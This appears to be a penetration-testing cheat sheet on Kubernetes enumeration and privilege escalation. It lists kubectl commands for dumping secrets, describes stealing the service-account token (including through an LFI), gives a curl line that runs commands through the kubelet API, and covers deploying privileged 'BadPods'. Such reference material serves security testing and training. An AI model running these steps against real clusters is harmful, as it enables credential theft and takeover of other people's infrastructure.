killchain-compendium/Enumeration/Kubernetes.md

3.1 KiB

Kubernetes Enumeration

Levels of abstraction in a Kubernetes setup are high and challenging to maintain even if you get paid to work on the cluster. Challenging part of enumerating a unknown Kubernetes cluster is the potential amount of possible different kinds and types of configurations.
Ideally, Kubernetes enumeration results in a (high privilege) token or ideally in credentials as secrets in the cluster.

Kubectl

You should check for all kinds and types of configuration items in the namespaces you got permissions for. Starting with a check of what you are permitted to list

kubectl auth can-i --list

Follow up with a listing and description of all pods, -A to list all namespaces.

kubectl get pods -A 

Check if you can output mounted secret

kubectl get services
kubectl get secrets
kubectl get nodes
kubectl get deployments
kubectl get ingress
kubectl get jobs
  • Intel about a secret, and output
kubectl describe secrets <secret>  -o yaml
kubectl get secret <secret> -o json
kubectl describe secrets <secret> -o 'json'

Abuse Token

  • Inside a pod the service token(jwt) can be found under /var/run/secrets/kubernetes.io/serviceaccount/token By any chance of an LFI extract the token and take a look on what you are permitted to list and describe using it.
kubectl auth can-i --list --token=$TOKEN
kubectl get pods  --token=$TOKEN
kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
  • Do not copy the token around, it will end in a carfuffle of some truncated string most of the time. Just store it in the following way and spare the pain for another day
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)

Elevate Permissions with found token

If a token has been found but its permissions on other containers can not be used through kubectl directly, try to use curl as well via the following line

curl  -k -H "Authorization: Bearer $TOKEN" --data "cmd=id" https://$K8_IP:10250/run/$NAMESPACE/$POD/$CONTAINER

To create the URL you wnat to query, find namespace and pods

kubectl get pods -A

Next, take a look at the name of container inside the pod description under ContainerStatuses/name

kubectl get pod $POD -n $NAMESPACE -o yaml

Interesting find in any high priv container are

/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/ca.crt

Enumerate again with the new found token

kubectl auth can-i --list

Create Malicious Pods

  • Use BishopFox's BadPods
  • If there is no internet connection add imagePullPolicy: IfNotPresent to the YAML file
kubectl apply -f pod.yml --token=$TOKEN
  • Start Pod
kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash

Start Pods

kubectl exec -it  <podname> -n <namespace> -- /bin/bash

Tools

Microk8s

Enumeration of Microk8s

microk8s kubectl get nodes
microk8s kubectl get services
microk8s kubectl get pods
microk8s kubectl get deployments -o wide
microk8s kubectl cluster-info